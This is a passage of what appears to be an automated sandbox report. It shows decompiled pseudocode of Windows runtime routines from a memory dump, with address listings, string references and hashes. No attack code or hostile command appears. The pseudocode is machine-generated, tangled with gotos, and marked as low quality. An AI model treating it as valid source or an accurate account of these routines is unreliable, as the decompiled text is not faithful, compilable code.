                                                              													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                              													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                              														L18:
                                                              														__eflags = _t130;
                                                              														if(_t130 != 0) {
                                                              															goto L32;
                                                              														} else {
                                                              															__eflags = _v5 - _t130;
                                                              															if(_v5 == _t130) {
                                                              																goto L32;
                                                              															} else {
                                                              																_t86 =  *[fs:0x18];
                                                              																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                              																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                              																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                              																}
                                                              																__eflags = _t177;
                                                              																if(_t177 == 0) {
                                                              																	L31:
                                                              																	__eflags = 0;
                                                              																	L04BA70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                              																	goto L32;
                                                              																} else {
                                                              																	__eflags = _v24;
                                                              																	_t91 =  *(_t177 + 0x20);
                                                              																	if(_v24 != 0) {
                                                              																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                              																		goto L31;
                                                              																	} else {
                                                              																		_t141 = _t91 & 0x00000040;
                                                              																		__eflags = _t170 & 0x00000100;
                                                              																		if((_t170 & 0x00000100) == 0) {
                                                              																			__eflags = _t141;
                                                              																			if(_t141 == 0) {
                                                              																				L74:
                                                              																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                              																				goto L27;
                                                              																			} else {
                                                              																				_t177 = E04BCFD22(_t177);
                                                              																				__eflags = _t177;
                                                              																				if(_t177 == 0) {
                                                              																					goto L42;
                                                              																				} else {
                                                              																					_t130 = E04BCFD9B(_t177, 0, 4);
                                                              																					__eflags = _t130;
                                                              																					if(_t130 != 0) {
                                                              																						goto L42;
                                                              																					} else {
                                                              																						_t68 = _t177 + 0x20;
                                                              																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                              																						__eflags =  *_t68;
                                                              																						_t91 =  *(_t177 + 0x20);
                                                              																						goto L74;
                                                              																					}
                                                              																				}
                                                              																			}
                                                              																			goto L35;
                                                              																		} else {
                                                              																			__eflags = _t141;
                                                              																			if(_t141 != 0) {
                                                              																				_t177 = E04BCFD22(_t177);
                                                              																				__eflags = _t177;
                                                              																				if(_t177 == 0) {
                                                              																					L42:
                                                              																					_t77 = 0xc0000001;
                                                              																					goto L33;
                                                              																				} else {
                                                              																					_t130 = E04BCFD9B(_t177, 0, 4);
                                                              																					__eflags = _t130;
                                                              																					if(_t130 != 0) {
                                                              																						goto L42;
                                                              																					} else {
                                                              																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                              																						_t91 =  *(_t177 + 0x20);
                                                              																						goto L26;
                                                              																					}
                                                              																				}
                                                              																				goto L35;
                                                              																			} else {
                                                              																				L26:
                                                              																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                              																				__eflags = _t94;
                                                              																				L27:
                                                              																				 *(_t177 + 0x20) = _t94;
                                                              																				__eflags = _t170 & 0x00008000;
                                                              																				if((_t170 & 0x00008000) != 0) {
                                                              																					_t95 = _a12;
                                                              																					__eflags = _t95;
                                                              																					if(_t95 != 0) {
                                                              																						_t96 =  *_t95;
                                                              																						__eflags = _t96;
                                                              																						if(_t96 != 0) {
                                                              																							 *((short*)(_t177 + 0x22)) = 0;
                                                              																							_t40 = _t177 + 0x20;
                                                              																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                              																							__eflags =  *_t40;
                                                              																						}
                                                              																					}
                                                              																				}
                                                              																				goto L31;
                                                              																			}
                                                              																		}
                                                              																	}
                                                              																}
                                                              															}
                                                              														}
                                                              													} else {
                                                              														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                              														_t106 =  *(_t147 + 0x20);
                                                              														__eflags = _t106 & 0x00000040;
                                                              														if((_t106 & 0x00000040) != 0) {
                                                              															_t147 = E04BCFD22(_t147);
                                                              															__eflags = _t147;
                                                              															if(_t147 == 0) {
                                                              																L41:
                                                              																_t130 = 0xc0000001;
                                                              																L32:
                                                              																_t77 = _t130;
                                                              																goto L33;
                                                              															} else {
                                                              																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                              																_t106 =  *(_t147 + 0x20);
                                                              																goto L17;
                                                              															}
                                                              															goto L35;
                                                              														} else {
                                                              															L17:
                                                              															_t108 = _t106 | 0x00000080;
                                                              															__eflags = _t108;
                                                              															 *(_t147 + 0x20) = _t108;
                                                              															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                              															goto L18;
                                                              														}
                                                              													}
                                                              												}
                                                              											}
                                                              											L33:
                                                              										}
                                                              									}
                                                              								}
                                                              							}
                                                              						}
                                                              						L35:
                                                              						return _t77;
                                                              					} else {
                                                              						 *_t75 = 0x4c87b80;
                                                              						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                              						 *_t134 = _t75;
                                                              						 *0x4c87b84 = _t75;
                                                              						_t73 = E04BAEB70(_t134, 0x4c87b60);
                                                              						if( *0x4c87b20 != 0) {
                                                              							_t73 =  *( *[fs:0x30] + 0xc);
                                                              							if( *((char*)(_t73 + 0x28)) == 0) {
                                                              								_t73 = E04BAFF60( *0x4c87b20);
                                                              							}
                                                              						}
                                                              						goto L5;
                                                              					}
                                                              				}
                                                              			}

















































                                                              0x04bcfab0
                                                              0x04bcfab2
                                                              0x04bcfab3
                                                              0x04bcfab4
                                                              0x04bcfabc
                                                              0x04bcfac0
                                                              0x04bcfb14
                                                              0x04bcfb17
                                                              0x04bcfac2
                                                              0x04bcfac8
                                                              0x04bcfacd
                                                              0x04bcfad3
                                                              0x04bcfad3
                                                              0x04bcfadd
                                                              0x04bcfb18
                                                              0x04bcfb1b
                                                              0x04bcfb1d
                                                              0x04bcfb1e
                                                              0x04bcfb1f
                                                              0x04bcfb20
                                                              0x04bcfb21
                                                              0x04bcfb22
                                                              0x04bcfb23
                                                              0x04bcfb24
                                                              0x04bcfb25
                                                              0x04bcfb26
                                                              0x04bcfb27
                                                              0x04bcfb28
                                                              0x04bcfb29
                                                              0x04bcfb2a
                                                              0x04bcfb2b
                                                              0x04bcfb2c
                                                              0x04bcfb2d
                                                              0x04bcfb2e
                                                              0x04bcfb2f
                                                              0x04bcfb3a
                                                              0x04bcfb3b
                                                              0x04bcfb3e
                                                              0x04bcfb41
                                                              0x04bcfb44
                                                              0x04bcfb47
                                                              0x04bcfb4a
                                                              0x04bcfb4d
                                                              0x04bcfb53
                                                              0x04c0bdcb
                                                              0x04c0bdcb
                                                              0x04bcfb59
                                                              0x04bcfb5b
                                                              0x04bcfb5b
                                                              0x04bcfb5e
                                                              0x04c0bdd5
                                                              0x04c0bdd8
                                                              0x00000000
                                                              0x04c0bdda
                                                              0x00000000
                                                              0x04c0bdda
                                                              0x04bcfb64
                                                              0x04bcfb64
                                                              0x04bcfb64
                                                              0x04bcfb67
                                                              0x04bcfb6e
                                                              0x04bcfb70
                                                              0x04bcfb72
                                                              0x00000000
                                                              0x04bcfb78
                                                              0x04bcfb7a
                                                              0x04bcfb7a
                                                              0x04bcfb7d
                                                              0x04bcfb80
                                                              0x04c0bddf
                                                              0x04c0bde1
                                                              0x00000000
                                                              0x04c0bde3
                                                              0x00000000
                                                              0x04c0bde3
                                                              0x04bcfb86
                                                              0x04bcfb86
                                                              0x04bcfb86
                                                              0x04bcfb8b
                                                              0x04bcfb90
                                                              0x04bcfb92
                                                              0x04bcfb94
                                                              0x04bcfb9a
                                                              0x04bcfb9b
                                                              0x04bcfba1
                                                              0x04c0bde8
                                                              0x04c0bdeb
                                                              0x04c0bded
                                                              0x04c0beb5
                                                              0x04c0beb5
                                                              0x04c0bebb
                                                              0x04c0bebd
                                                              0x04c0bec3
                                                              0x04c0bed2
                                                              0x04c0bedd
                                                              0x04c0bedd
                                                              0x04c0beed
                                                              0x00000000
                                                              0x04c0bdf3
                                                              0x04c0bdfe
                                                              0x04c0be06
                                                              0x04c0be0b
                                                              0x04c0be0d
                                                              0x04c0be0f
                                                              0x04c0be14
                                                              0x04c0be19
                                                              0x04c0be20
                                                              0x04c0be25
                                                              0x04c0be27
                                                              0x04c0be35
                                                              0x04c0be39
                                                              0x04c0be46
                                                              0x04c0be4f
                                                              0x04c0be54
                                                              0x04c0be56
                                                              0x04c0bef8
                                                              0x04c0bef8
                                                              0x00000000
                                                              0x04c0be5c
                                                              0x04c0be5c
                                                              0x04c0be60
                                                              0x00000000
                                                              0x04c0be66
                                                              0x04c0be66
                                                              0x04c0be7f
                                                              0x04c0be84
                                                              0x04c0be87
                                                              0x04c0be89
                                                              0x04c0be8b
                                                              0x04c0be99
                                                              0x04c0be9d
                                                              0x04c0bea0
                                                              0x04c0beac
                                                              0x04c0beaf
                                                              0x04c0beb1
                                                              0x04c0beb3
                                                              0x04c0beb3
                                                              0x00000000
                                                              0x04c0bea2
                                                              0x04c0bea2
                                                              0x00000000
                                                              0x04c0bea2
                                                              0x04c0be8d
                                                              0x04c0be8d
                                                              0x04c0be92
                                                              0x00000000
                                                              0x04c0be92
                                                              0x04c0be8b
                                                              0x04c0be60
                                                              0x04c0be3b
                                                              0x04c0be3b
                                                              0x04c0be3e
                                                              0x00000000
                                                              0x04c0be40
                                                              0x04c0be40
                                                              0x04c0be44
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04c0be44
                                                              0x04c0be3e
                                                              0x04c0be29
                                                              0x04c0be29
                                                              0x00000000
                                                              0x04c0be29
                                                              0x04c0be27
                                                              0x00000000
                                                              0x04bcfba7
                                                              0x04bcfba7
                                                              0x04bcfbab
                                                              0x04c0bf02
                                                              0x04bcfbb1
                                                              0x04bcfbb1
                                                              0x04bcfbb8
                                                              0x04bcfbbd
                                                              0x04bcfbbd
                                                              0x04bcfbbf
                                                              0x04bcfbbf
                                                              0x04bcfbc5
                                                              0x04bcfbcb
                                                              0x04bcfbf8
                                                              0x04bcfbf8
                                                              0x04bcfbfa
                                                              0x00000000
                                                              0x04bcfc00
                                                              0x04bcfc00
                                                              0x04bcfc03
                                                              0x00000000
                                                              0x04bcfc09
                                                              0x04bcfc09
                                                              0x04bcfc0f
                                                              0x04bcfc15
                                                              0x04bcfc23
                                                              0x04bcfc23
                                                              0x04bcfc25
                                                              0x04bcfc27
                                                              0x04bcfc75
                                                              0x04bcfc7c
                                                              0x04bcfc84
                                                              0x00000000
                                                              0x04bcfc29
                                                              0x04bcfc29
                                                              0x04bcfc2d
                                                              0x04bcfc30
                                                              0x04c0bf0f
                                                              0x00000000
                                                              0x04bcfc36
                                                              0x04bcfc38
                                                              0x04bcfc3b
                                                              0x04bcfc41
                                                              0x04c0bf17
                                                              0x04c0bf19
                                                              0x04c0bf48
                                                              0x04c0bf4b
                                                              0x00000000
                                                              0x04c0bf1b
                                                              0x04c0bf22
                                                              0x04c0bf24
                                                              0x04c0bf26
                                                              0x00000000
                                                              0x04c0bf2c
                                                              0x04c0bf37
                                                              0x04c0bf39
                                                              0x04c0bf3b
                                                              0x00000000
                                                              0x04c0bf41
                                                              0x04c0bf41
                                                              0x04c0bf41
                                                              0x04c0bf41
                                                              0x04c0bf45
                                                              0x00000000
                                                              0x04c0bf45
                                                              0x04c0bf3b
                                                              0x04c0bf26
                                                              0x00000000
                                                              0x04bcfc47
                                                              0x04bcfc47
                                                              0x04bcfc49
                                                              0x04bcfcb2
                                                              0x04bcfcb4
                                                              0x04bcfcb6
                                                              0x04bcfcdc
                                                              0x04bcfcdc
                                                              0x00000000
                                                              0x04bcfcb8
                                                              0x04bcfcc3
                                                              0x04bcfcc5
                                                              0x04bcfcc7
                                                              0x00000000
                                                              0x04bcfcc9
                                                              0x04bcfcc9
                                                              0x04bcfccd
                                                              0x00000000
                                                              0x04bcfccd
                                                              0x04bcfcc7
                                                              0x00000000
                                                              0x04bcfc4b
                                                              0x04bcfc4b
                                                              0x04bcfc4e
                                                              0x04bcfc4e
                                                              0x04bcfc51
                                                              0x04bcfc51
                                                              0x04bcfc54
                                                              0x04bcfc5a
                                                              0x04bcfc5c
                                                              0x04bcfc5f
                                                              0x04bcfc61
                                                              0x04bcfc63
                                                              0x04bcfc65
                                                              0x04bcfc67
                                                              0x04bcfc6e
                                                              0x04bcfc72
                                                              0x04bcfc72
                                                              0x04bcfc72
                                                              0x04bcfc72
                                                              0x04bcfc67
                                                              0x04bcfc61
                                                              0x00000000
                                                              0x04bcfc5a
                                                              0x04bcfc49
                                                              0x04bcfc41
                                                              0x04bcfc30
                                                              0x04bcfc27
                                                              0x04bcfc03
                                                              0x04bcfbcd
                                                              0x04bcfbd3
                                                              0x04bcfbd9
                                                              0x04bcfbdc
                                                              0x04bcfbde
                                                              0x04bcfc99
                                                              0x04bcfc9b
                                                              0x04bcfc9d
                                                              0x04bcfcd5
                                                              0x04bcfcd5
                                                              0x04bcfc89
                                                              0x04bcfc89
                                                              0x00000000
                                                              0x04bcfc9f
                                                              0x04bcfc9f
                                                              0x04bcfca3
                                                              0x00000000
                                                              0x04bcfca3
                                                              0x00000000
                                                              0x04bcfbe4
                                                              0x04bcfbe4
                                                              0x04bcfbe4
                                                              0x04bcfbe4
                                                              0x04bcfbe9
                                                              0x04bcfbf2
                                                              0x00000000
                                                              0x04bcfbf2
                                                              0x04bcfbde
                                                              0x04bcfbcb
                                                              0x04bcfbab
                                                              0x04bcfc8b
                                                              0x04bcfc8b
                                                              0x04bcfc8c
                                                              0x04bcfb80
                                                              0x04bcfb72
                                                              0x04bcfb5e
                                                              0x04bcfc8d
                                                              0x04bcfc91
                                                              0x04bcfadf
                                                              0x04bcfadf
                                                              0x04bcfae1
                                                              0x04bcfae4
                                                              0x04bcfae7
                                                              0x04bcfaec
                                                              0x04bcfaf8
                                                              0x04bcfb00
                                                              0x04bcfb07
                                                              0x04bcfb0f
                                                              0x04bcfb0f
                                                              0x04bcfb07
                                                              0x00000000
                                                              0x04bcfaf8
                                                              0x04bcfadd

                                                              Strings
                                                              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 04C0BE0F
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                              • API String ID: 0-865735534
                                                              • Opcode ID: 64f1f2af627d0d6eb5373212277418ee97c03b46a89e379f9da1cf2852273678
                                                              • Instruction ID: 85a7aaf407cef911d31f770b54023e9ed5f4aa65f00ef3e58914c5597ab4f253
                                                              • Opcode Fuzzy Hash: 64f1f2af627d0d6eb5373212277418ee97c03b46a89e379f9da1cf2852273678
                                                              • Instruction Fuzzy Hash: 2DA1C471B006069BEB25DFA4C490B7AB3A7EB44714F0485EDE856DB6C0EB34FD418B90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 63%
                                                              			E04B92D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                              				signed char _v8;
                                                              				signed int _v12;
                                                              				signed int _v16;
                                                              				signed int _v20;
                                                              				signed int _v24;
                                                              				intOrPtr _v28;
                                                              				intOrPtr _v32;
                                                              				signed int _v52;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				intOrPtr _t55;
                                                              				signed int _t57;
                                                              				signed int _t58;
                                                              				char* _t62;
                                                              				signed char* _t63;
                                                              				signed char* _t64;
                                                              				signed int _t67;
                                                              				signed int _t72;
                                                              				signed int _t77;
                                                              				signed int _t78;
                                                              				signed int _t88;
                                                              				intOrPtr _t89;
                                                              				signed char _t93;
                                                              				signed int _t97;
                                                              				signed int _t98;
                                                              				signed int _t102;
                                                              				signed int _t103;
                                                              				intOrPtr _t104;
                                                              				signed int _t105;
                                                              				signed int _t106;
                                                              				signed char _t109;
                                                              				signed int _t111;
                                                              				void* _t116;
                                                              
                                                              				_t102 = __edi;
                                                              				_t97 = __edx;
                                                              				_v12 = _v12 & 0x00000000;
                                                              				_t55 =  *[fs:0x18];
                                                              				_t109 = __ecx;
                                                              				_v8 = __edx;
                                                              				_t86 = 0;
                                                              				_v32 = _t55;
                                                              				_v24 = 0;
                                                              				_push(__edi);
                                                              				if(__ecx == 0x4c85350) {
                                                              					_t86 = 1;
                                                              					_v24 = 1;
                                                              					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                              				}
                                                              				_t103 = _t102 | 0xffffffff;
                                                              				if( *0x4c87bc8 != 0) {
                                                              					_push(0xc000004b);
                                                              					_push(_t103);
                                                              					E04BD97C0();
                                                              				}
                                                              				if( *0x4c879c4 != 0) {
                                                              					_t57 = 0;
                                                              				} else {
                                                              					_t57 = 0x4c879c8;
                                                              				}
                                                              				_v16 = _t57;
                                                              				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                                              					_t93 = _t109;
                                                              					L23();
                                                              				}
                                                              				_t58 =  *_t109;
                                                              				if(_t58 == _t103) {
                                                              					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                                              					_t58 = _t103;
                                                              					if(__eflags == 0) {
                                                              						_t93 = _t109;
                                                              						E04BC1624(_t86, __eflags);
                                                              						_t58 =  *_t109;
                                                              					}
                                                              				}
                                                              				_v20 = _v20 & 0x00000000;
                                                              				if(_t58 != _t103) {
                                                              					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                              				}
                                                              				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                              				_t88 = _v16;
                                                              				_v28 = _t104;
                                                              				L9:
                                                              				while(1) {
                                                              					if(E04BB7D50() != 0) {
                                                              						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                              					} else {
                                                              						_t62 = 0x7ffe0382;
                                                              					}
                                                              					if( *_t62 != 0) {
                                                              						_t63 =  *[fs:0x30];
                                                              						__eflags = _t63[0x240] & 0x00000002;
                                                              						if((_t63[0x240] & 0x00000002) != 0) {
                                                              							_t93 = _t109;
                                                              							E04C2FE87(_t93);
                                                              						}
                                                              					}
                                                              					if(_t104 != 0xffffffff) {
                                                              						_push(_t88);
                                                              						_push(0);
                                                              						_push(_t104);
                                                              						_t64 = E04BD9520();
                                                              						goto L15;
                                                              					} else {
                                                              						while(1) {
                                                              							_t97 =  &_v8;
                                                              							_t64 = E04BCE18B(_t109 + 4, _t97, 4, _t88, 0);
                                                              							if(_t64 == 0x102) {
                                                              								break;
                                                              							}
                                                              							_t93 =  *(_t109 + 4);
                                                              							_v8 = _t93;
                                                              							if((_t93 & 0x00000002) != 0) {
                                                              								continue;
                                                              							}
                                                              							L15:
                                                              							if(_t64 == 0x102) {
                                                              								break;
                                                              							}
                                                              							_t89 = _v24;
                                                              							if(_t64 < 0) {
                                                              								L04BEDF30(_t93, _t97, _t64);
                                                              								_push(_t93);
                                                              								_t98 = _t97 | 0xffffffff;
                                                              								__eflags =  *0x4c86901;
                                                              								_push(_t109);
                                                              								_v52 = _t98;
                                                              								if( *0x4c86901 != 0) {
                                                              									_push(0);
                                                              									_push(1);
                                                              									_push(0);
                                                              									_push(0x100003);
                                                              									_push( &_v12);
                                                              									_t72 = E04BD9980();
                                                              									__eflags = _t72;
                                                              									if(_t72 < 0) {
                                                              										_v12 = _t98 | 0xffffffff;
                                                              									}
                                                              								}
                                                              								asm("lock cmpxchg [ecx], edx");
                                                              								_t111 = 0;
                                                              								__eflags = 0;
                                                              								if(0 != 0) {
                                                              									__eflags = _v12 - 0xffffffff;
                                                              									if(_v12 != 0xffffffff) {
                                                              										_push(_v12);
                                                              										E04BD95D0();
                                                              									}
                                                              								} else {
                                                              									_t111 = _v12;
                                                              								}
                                                              								return _t111;
                                                              							} else {
                                                              								if(_t89 != 0) {
                                                              									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                              									_t77 = E04BB7D50();
                                                              									__eflags = _t77;
                                                              									if(_t77 == 0) {
                                                              										_t64 = 0x7ffe0384;
                                                              									} else {
                                                              										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                              									}
                                                              									__eflags =  *_t64;
                                                              									if( *_t64 != 0) {
                                                              										_t64 =  *[fs:0x30];
                                                              										__eflags = _t64[0x240] & 0x00000004;
                                                              										if((_t64[0x240] & 0x00000004) != 0) {
                                                              											_t78 = E04BB7D50();
                                                              											__eflags = _t78;
                                                              											if(_t78 == 0) {
                                                              												_t64 = 0x7ffe0385;
                                                              											} else {
                                                              												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                              											}
                                                              											__eflags =  *_t64 & 0x00000020;
                                                              											if(( *_t64 & 0x00000020) != 0) {
                                                              												_t64 = E04C17016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                              											}
                                                              										}
                                                              									}
                                                              								}
                                                              								return _t64;
                                                              							}
                                                              						}
                                                              						_t97 = _t88;
                                                              						_t93 = _t109;
                                                              						E04C2FDDA(_t97, _v12);
                                                              						_t105 =  *_t109;
                                                              						_t67 = _v12 + 1;
                                                              						_v12 = _t67;
                                                              						__eflags = _t105 - 0xffffffff;
                                                              						if(_t105 == 0xffffffff) {
                                                              							_t106 = 0;
                                                              							__eflags = 0;
                                                              						} else {
                                                              							_t106 =  *(_t105 + 0x14);
                                                              						}
                                                              						__eflags = _t67 - 2;
                                                              						if(_t67 > 2) {
                                                              							__eflags = _t109 - 0x4c85350;
                                                              							if(_t109 != 0x4c85350) {
                                                              								__eflags = _t106 - _v20;
                                                              								if(__eflags == 0) {
                                                              									_t93 = _t109;
                                                              									E04C2FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                              								}
                                                              							}
                                                              						}
                                                              						_push("RTL: Re-Waiting\n");
                                                              						_push(0);
                                                              						_push(0x65);
                                                              						_v20 = _t106;
                                                              						E04C25720();
                                                              						_t104 = _v28;
                                                              						_t116 = _t116 + 0xc;
                                                              						continue;
                                                              					}
                                                              				}
                                                              			}




































                                                              0x04b92d8a
                                                              0x04b92d8a
                                                              0x04b92d92
                                                              0x04b92d96
                                                              0x04b92d9e
                                                              0x04b92da0
                                                              0x04b92da3
                                                              0x04b92da5
                                                              0x04b92da8
                                                              0x04b92dab
                                                              0x04b92db2
                                                              0x04bef9aa
                                                              0x04bef9ab
                                                              0x04bef9ae
                                                              0x04bef9ae
                                                              0x04b92db8
                                                              0x04b92dc2
                                                              0x04bef9b9
                                                              0x04bef9be
                                                              0x04bef9bf
                                                              0x04bef9bf
                                                              0x04b92dcf
                                                              0x04bef9c9
                                                              0x04b92dd5
                                                              0x04b92dd5
                                                              0x04b92dd5
                                                              0x04b92dde
                                                              0x04b92de1
                                                              0x04b92e70
                                                              0x04b92e72
                                                              0x04b92e72
                                                              0x04b92de7
                                                              0x04b92deb
                                                              0x04b92e7c
                                                              0x04b92e83
                                                              0x04b92e85
                                                              0x04b92e8b
                                                              0x04b92e8d
                                                              0x04b92e92
                                                              0x04b92e92
                                                              0x04b92e85
                                                              0x04b92df1
                                                              0x04b92df7
                                                              0x04b92df9
                                                              0x04b92df9
                                                              0x04b92dfc
                                                              0x04b92dff
                                                              0x04b92e02
                                                              0x00000000
                                                              0x04b92e05
                                                              0x04b92e0c
                                                              0x04bef9d9
                                                              0x04b92e12
                                                              0x04b92e12
                                                              0x04b92e12
                                                              0x04b92e1a
                                                              0x04bef9e3
                                                              0x04bef9e9
                                                              0x04bef9f0
                                                              0x04bef9f6
                                                              0x04bef9f8
                                                              0x04bef9f8
                                                              0x04bef9f0
                                                              0x04b92e23
                                                              0x04befa02
                                                              0x04befa03
                                                              0x04befa05
                                                              0x04befa06
                                                              0x00000000
                                                              0x04b92e29
                                                              0x04b92e29
                                                              0x04b92e2e
                                                              0x04b92e34
                                                              0x04b92e3e
                                                              0x00000000
                                                              0x00000000
                                                              0x04b92e44
                                                              0x04b92e47
                                                              0x04b92e4d
                                                              0x00000000
                                                              0x00000000
                                                              0x04b92e4f
                                                              0x04b92e54
                                                              0x00000000
                                                              0x00000000
                                                              0x04b92e5a
                                                              0x04b92e5f
                                                              0x04b92e9a
                                                              0x04b92ea4
                                                              0x04b92ea5
                                                              0x04b92ea8
                                                              0x04b92eaf
                                                              0x04b92eb2
                                                              0x04b92eb5
                                                              0x04befae9
                                                              0x04befaeb
                                                              0x04befaed
                                                              0x04befaef
                                                              0x04befaf7
                                                              0x04befaf8
                                                              0x04befafd
                                                              0x04befaff
                                                              0x04befb04
                                                              0x04befb04
                                                              0x04befaff
                                                              0x04b92ec0
                                                              0x04b92ec4
                                                              0x04b92ec6
                                                              0x04b92ec8
                                                              0x04befb14
                                                              0x04befb18
                                                              0x04befb1e
                                                              0x04befb21
                                                              0x04befb21
                                                              0x04b92ece
                                                              0x04b92ece
                                                              0x04b92ece
                                                              0x04b92ed7
                                                              0x04b92e61
                                                              0x04b92e63
                                                              0x04befa6b
                                                              0x04befa71
                                                              0x04befa76
                                                              0x04befa78
                                                              0x04befa8a
                                                              0x04befa7a
                                                              0x04befa83
                                                              0x04befa83
                                                              0x04befa8f
                                                              0x04befa91
                                                              0x04befa97
                                                              0x04befa9d
                                                              0x04befaa4
                                                              0x04befaaa
                                                              0x04befaaf
                                                              0x04befab1
                                                              0x04befac3
                                                              0x04befab3
                                                              0x04befabc
                                                              0x04befabc
                                                              0x04befac8
                                                              0x04befacb
                                                              0x04befadf
                                                              0x04befadf
                                                              0x04befacb
                                                              0x04befaa4
                                                              0x04befa91
                                                              0x04b92e6f
                                                              0x04b92e6f
                                                              0x04b92e5f
                                                              0x04befa13
                                                              0x04befa15
                                                              0x04befa17
                                                              0x04befa1f
                                                              0x04befa21
                                                              0x04befa22
                                                              0x04befa25
                                                              0x04befa28
                                                              0x04befa2f
                                                              0x04befa2f
                                                              0x04befa2a
                                                              0x04befa2a
                                                              0x04befa2a
                                                              0x04befa31
                                                              0x04befa34
                                                              0x04befa36
                                                              0x04befa3c
                                                              0x04befa3e
                                                              0x04befa41
                                                              0x04befa43
                                                              0x04befa45
                                                              0x04befa45
                                                              0x04befa41
                                                              0x04befa3c
                                                              0x04befa4a
                                                              0x04befa4f
                                                              0x04befa51
                                                              0x04befa53
                                                              0x04befa56
                                                              0x04befa5b
                                                              0x04befa5e
                                                              0x00000000
                                                              0x04befa5e
                                                              0x04b92e23

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Re-Waiting
                                                              • API String ID: 0-316354757
                                                              • Opcode ID: 95ce2bee7f7819fe5340fc906ef8e65611a455249dd19f78c27803e0b8665549
                                                              • Instruction ID: 04f02df1fd813b4434d63efa2ab86cde5830a5a1d8feebe2235106e43c98642e
                                                              • Opcode Fuzzy Hash: 95ce2bee7f7819fe5340fc906ef8e65611a455249dd19f78c27803e0b8665549
                                                              • Instruction Fuzzy Hash: 5D611170E00A05BBEB25DF69C880B7E77F5EB84318F180AE9D8519B2D0DB74BD01A791
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 80%
                                                              			E04C60EA5(void* __ecx, void* __edx) {
                                                              				signed int _v20;
                                                              				char _v24;
                                                              				intOrPtr _v28;
                                                              				unsigned int _v32;
                                                              				signed int _v36;
                                                              				intOrPtr _v40;
                                                              				char _v44;
                                                              				intOrPtr _v64;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				signed int _t58;
                                                              				unsigned int _t60;
                                                              				intOrPtr _t62;
                                                              				char* _t67;
                                                              				char* _t69;
                                                              				void* _t80;
                                                              				void* _t83;
                                                              				intOrPtr _t93;
                                                              				intOrPtr _t115;
                                                              				char _t117;
                                                              				void* _t120;
                                                              
                                                              				_t83 = __edx;
                                                              				_t117 = 0;
                                                              				_t120 = __ecx;
                                                              				_v44 = 0;
                                                              				if(E04C5FF69(__ecx,  &_v44,  &_v32) < 0) {
                                                              					L24:
                                                              					_t109 = _v44;
                                                              					if(_v44 != 0) {
                                                              						E04C61074(_t83, _t120, _t109, _t117, _t117);
                                                              					}
                                                              					L26:
                                                              					return _t117;
                                                              				}
                                                              				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                                              				_t5 = _t83 + 1; // 0x1
                                                              				_v36 = _t5 << 0xc;
                                                              				_v40 = _t93;
                                                              				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                                              				asm("sbb ebx, ebx");
                                                              				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                                              				if(_t58 != 0) {
                                                              					_push(0);
                                                              					_push(0x14);
                                                              					_push( &_v24);
                                                              					_push(3);
                                                              					_push(_t93);
                                                              					_push(0xffffffff);
                                                              					_t80 = E04BD9730();
                                                              					_t115 = _v64;
                                                              					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                                              						_push(_t93);
                                                              						E04C5A80D(_t115, 1, _v20, _t117);
                                                              						_t83 = 4;
                                                              					}
                                                              				}
                                                              				if(E04C5A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                                              					goto L24;
                                                              				}
